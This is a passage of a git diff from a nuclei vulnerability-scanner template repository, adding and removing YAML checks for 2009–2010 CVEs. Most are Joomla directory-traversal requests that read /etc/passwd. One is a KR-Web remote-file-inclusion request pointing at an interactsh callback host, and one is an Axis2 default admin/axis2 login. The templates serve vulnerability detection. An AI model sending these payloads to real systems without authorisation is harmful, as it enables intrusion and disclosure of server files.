0000000000..db846d97e7 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-2100.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-2100 + +info: + name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8946 + - https://www.cvedetails.com/cve/CVE-2009-2100 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2009/cve-2009-3053.yaml b/nuclei-templates/CVE-2009/cve-2009-3053.yaml deleted file mode 100644 index 3a0a3a1739..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-3053.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2009-3053 - -info: - name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. - reference: - - https://www.exploit-db.com/exploits/9564 - - https://www.cvedetails.com/cve/CVE-2009-3053 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2009/cve-2009-3318.yaml b/nuclei-templates/CVE-2009/cve-2009-3318.yaml deleted file mode 100644 index 957a9932a2..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-3318.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2009-3318 - -info: - name: Joomla! Component com_album 1.14 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/9706 - - https://www.cvedetails.com/cve/CVE-2009-3318 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2009/cve-2009-4202.yaml b/nuclei-templates/CVE-2009/cve-2009-4202.yaml deleted file mode 100644 index 8f872ac535..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-4202.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2009-4202 - -info: - name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8870 - - https://www.cvedetails.com/cve/CVE-2009-4202 - tags: cve,cve2009,joomla,lfi,photo - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-4223.yaml b/nuclei-templates/CVE-2009/cve-2009-4223.yaml deleted file mode 100644 index c28fd9c671..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-4223.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2009-4223 - -info: - name: KR-Web <= 1.1b2 RFI - description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. - reference: - - https://sourceforge.net/projects/krw/ - - https://www.exploit-db.com/exploits/10216 - author: geeknik - severity: high - tags: cve,cve2009,krweb,rfi - -requests: - - method: GET - path: - - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: interactsh_protocol - words: - - "http" diff --git a/nuclei-templates/CVE-2009/cve-2009-4679.yaml b/nuclei-templates/CVE-2009/cve-2009-4679.yaml deleted file mode 100644 index d8a2c1c5b9..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-4679.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2009-4679 - -info: - name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: | - - https://www.exploit-db.com/exploits/33440 - - https://www.cvedetails.com/cve/CVE-2009-4679 - tags: cve,cve2009,joomla,lfi,nexus - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0219.yaml b/nuclei-templates/CVE-2010/CVE-2010-0219.yaml deleted file mode 100644 index 1599e7084c..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0219.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2010-0219 - -info: - name: Apache Axis2 Default Login - author: pikpikcu - severity: high - description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - - http://www.rapid7.com/security-center/advisories/R7-0037.jsp - - http://www.vupen.com/english/advisories/2010/2673 - classification: - cve-id: CVE-2010-0219 - metadata: - shodan-query: http.html:"Apache Axis" - tags: cve,cve2010,axis,apache,default-login,axis2 - -requests: - - raw: - - | - POST /axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - loginUsername={{username}}&loginPassword={{password}} - - - | - POST /axis2/axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userName={{username}}&password={{password}}&submit=+Login+ - - payloads: - username: - - admin - password: - - axis2 - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "

Welcome to Axis2 Web Admin Module !!

" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0696.yaml b/nuclei-templates/CVE-2010/CVE-2010-0696.yaml deleted file mode 100644 index b659158355..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0696.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2010-0696 - -info: - name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval - author: daffainfo - severity: high - description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/11447 - - https://www.cvedetails.com/cve/CVE-2010-0696 - - http://secunia.com/advisories/38587 - - http://www.joomlaworks.gr/content/view/77/34/ - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-0696 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0759.yaml b/nuclei-templates/CVE-2010/CVE-2010-0759.yaml new file mode 100644 index 0000000000..3df6950eb6 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-0759.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0759 + +info: + name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + reference: + - https://www.exploit-db.com/exploits/11498 + - https://www.cvedetails.com/cve/CVE-2010-0759 + - http://secunia.com/advisories/38637 + - http://www.securityfocus.com/bid/38296 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0759 + tags: cve,cve2010,joomla,lfi,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml b/nuclei-templates/CVE-2010/CVE-2010-0944.yaml new file mode 100644 index 0000000000..e3e41de5b4 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-0944.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0944 + +info: + name: Joomla! Component com_jcollection - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11088 + - https://www.cvedetails.com/cve/CVE-2010-0944 + - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt + - http://www.exploit-db.com/exploits/11088 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0944 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0972.yaml b/nuclei-templates/CVE-2010/CVE-2010-0972.yaml new file mode 100644 index 0000000000..37c142f65b --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-0972.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-0972 + +info: + name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11738 + - https://www.cvedetails.com/cve/CVE-2010-0972 + - http://secunia.com/advisories/38925 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0972 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml b/nuclei-templates/CVE-2010/CVE-2010-0982.yaml deleted file mode 100644 index a69166498d..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-0982 - -info: - name: Joomla! Component com_cartweberp - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10942 - - https://www.cvedetails.com/cve/CVE-2010-0982 - - http://www.securityfocus.com/bid/37581 - - http://secunia.com/advisories/37917 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0982 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0985.yaml b/nuclei-templates/CVE-2010/CVE-2010-0985.yaml deleted file mode 100644 index 614705c1c5..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0985.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-0985 - -info: - name: Joomla! Component com_abbrev - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10948 - - https://www.cvedetails.com/cve/CVE-2010-0985 - - http://www.securityfocus.com/bid/37560 - - http://osvdb.org/61458 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0985 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1056.yaml b/nuclei-templates/CVE-2010/CVE-2010-1056.yaml new file mode 100644 index 0000000000..0d90b69924 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1056.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1056 + +info: + name: Joomla! Component com_rokdownloads - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11760 + - https://www.cvedetails.com/cve/CVE-2010-1056 + - http://www.securityfocus.com/bid/38741 + - http://secunia.com/advisories/38982 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1056 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1307.yaml b/nuclei-templates/CVE-2010/CVE-2010-1307.yaml deleted file mode 100644 index 9b5bb7b612..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1307.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1307 - -info: - name: Joomla! Component Magic Updater - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12070 - - https://www.cvedetails.com/cve/CVE-2010-1307 - - http://secunia.com/advisories/39348 - - http://www.vupen.com/english/advisories/2010/0806 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1307 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1313.yaml b/nuclei-templates/CVE-2010/CVE-2010-1313.yaml new file mode 100644 index 0000000000..8025cded39 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1313.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1313 + +info: + name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12082 + - https://www.cvedetails.com/cve/CVE-2010-1313 + - http://www.securityfocus.com/bid/39237 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1313 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1314.yaml b/nuclei-templates/CVE-2010/CVE-2010-1314.yaml deleted file mode 100644 index 8801e334b1..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1314.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1314 - -info: - name: Joomla! Component Highslide 1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12086 - - https://www.cvedetails.com/cve/CVE-2010-1314 - - http://secunia.com/advisories/39359 - - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1314 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1340.yaml b/nuclei-templates/CVE-2010/CVE-2010-1340.yaml new file mode 100644 index 0000000000..999e6809a0 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1340.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1340 + +info: + name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/33797 + - https://www.cvedetails.com/cve/CVE-2010-1340 + - http://www.securityfocus.com/bid/38917 + - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1340 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1345.yaml b/nuclei-templates/CVE-2010/CVE-2010-1345.yaml new file mode 100644 index 0000000000..d97a1f819f --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1345.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1345 + +info: + name: Joomla! Component Cookex Agency CKForms - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15453 + - https://www.cvedetails.com/cve/CVE-2010-1345 + - http://www.exploit-db.com/exploits/11785 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1345 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1354.yaml b/nuclei-templates/CVE-2010/CVE-2010-1354.yaml new file mode 100644 index 0000000000..b6435650fe --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1354.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1354 + +info: + name: Joomla! Component VJDEO 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12102 + - https://www.cvedetails.com/cve/CVE-2010-1354 + - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt + - http://secunia.com/advisories/39296 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1354 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml deleted file mode 100644 index 0409f0399b..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1461 - -info: - name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12232 - - https://www.cvedetails.com/cve/CVE-2010-1461 - - http://www.securityfocus.com/bid/39504 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1461 - tags: cve,cve2010,joomla,lfi,photo - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml new file mode 100644 index 0000000000..bf37563f9b --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1470 + +info: + name: Joomla! Component Web TV 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12166 + - https://www.cvedetails.com/cve/CVE-2010-1470 + - http://secunia.com/advisories/39405 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1470 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1471.yaml b/nuclei-templates/CVE-2010/CVE-2010-1471.yaml new file mode 100644 index 0000000000..7234a24465 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1471.yaml @@ -0,0 +1,28 @@ +id: CVE-2010-1471 + +info: + name: Joomla! Component Address Book 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12170 + - https://www.cvedetails.com/cve/CVE-2010-1471 + - http://www.vupen.com/english/advisories/2010/0862 + classification: + cve-id: CVE-2010-1471 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1474.yaml b/nuclei-templates/CVE-2010/CVE-2010-1474.yaml new file mode 100644 index 0000000000..c7a14e2d70 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1474.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1474 + +info: + name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12182 + - https://www.cvedetails.com/cve/CVE-2010-1474 + - http://secunia.com/advisories/39388 + classification: + cve-id: CVE-2010-1474 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1475.yaml b/nuclei-templates/CVE-2010/CVE-2010-1475.yaml new file mode 100644 index 0000000000..bb3e999cac --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1475.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1475 + +info: + name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12147 + - https://www.cvedetails.com/cve/CVE-2010-1475 + - http://secunia.com/advisories/39285 + classification: + cve-id: CVE-2010-1475 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1476.yaml b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml new file mode 100644 index 0000000000..156adbb01b --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1476 + +info: + name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12150 + - https://www.cvedetails.com/cve/CVE-2010-1476 + - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt + - http://www.alphaplug.com/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1476 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1478.yaml b/nuclei-templates/CVE-2010/CVE-2010-1478.yaml deleted file mode 100644 index e364de8273..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1478.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2010-1478 - -info: - name: Joomla! Component Jfeedback 1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12145 - - https://www.cvedetails.com/cve/CVE-2010-1478 - - http://secunia.com/advisories/39262 - - http://www.securityfocus.com/bid/39390 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1478 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1491.yaml b/nuclei-templates/CVE-2010/CVE-2010-1491.yaml new file mode 100644 index 0000000000..bbda15aa41 --- /dev/null +++ 